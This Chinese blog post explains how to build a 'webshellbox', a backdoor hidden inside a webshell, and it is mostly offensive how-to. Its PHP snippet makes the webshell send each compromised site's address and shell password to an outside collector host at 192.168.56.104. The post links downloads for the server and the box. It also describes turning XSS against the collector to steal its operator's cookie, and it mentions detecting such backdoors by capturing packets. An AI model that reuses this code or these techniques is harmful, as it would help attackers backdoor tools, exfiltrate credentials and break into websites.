“黑吃黑”webshell箱子

Posted 2021-12-13 向阳-Y.

目录

• • “黑吃黑”webshell箱子
  • • 环境准备
    • 马中马
  • 预防后门
  • 反杀webshellbox

“黑吃黑”webshell箱子

什么是webshell箱子？通俗一点的解释：
它可以让你在webshell中植入后门，当别人用你植入过后门的webshell去获取渗透别的网站时，你的webshellbox信封将会收到他留下的后门地址以及密码

---

环境准备

搭建一个asp的服务器，我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.zip下载完成后解压到虚拟机里面。
箱子：https://pan.baidu.com/s/1D3msIms4Rcf098fqWdQgzQ
提取码：6666
细节我就不说了，搭建至下图这一步

马中马

插入到大马的代码中：

<?php
//假设这是某大马的php文件
//某大马的后门密码变量如下
$password='admin';
//马中马[doge]
$u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"];
echo "<script src='http://192.168.56.104/api.asp?url=$u&pass=$password'></script>
";
?>

解释：
&_SERVER["PHP_SELE"];正在执行的脚本文件名
$_SERVER["HTTP_HOST"];获取当前请求的host头部内容（网站地址）
上面两句实现获取当前网站的ip地址
echo "<script..../script>";指向信封（webshellbox）当大马获取的东西，你的webshellbox也能获取一份
另外：echo这句语法可以在webshellbox文件中查看到（ASP的就用第一句、PHP的就用第二句）：

最后访问网站后，webshell自动获取了大马的后门，以及后门密码

预防后门

如何判断自己使用的大马中没有被植入后门呢？
一般可以采用抓包，查看大马中有没有向一些奇怪的网站发送包

当找到后门地址后，甚至可以采用xss跨站攻击盗取cookie进行反杀…

反杀webshellbox

采用burpsuite抓包，抓到后门包后，将pass改为xss跨站攻击代码

当登录到后台查看时，成功爆出跨站代码

相关文章：

你知道吗？你用的大马可能早就被植入了后门！
如何利用xss拿下一个站的权限？
渗透测试常用靶场集合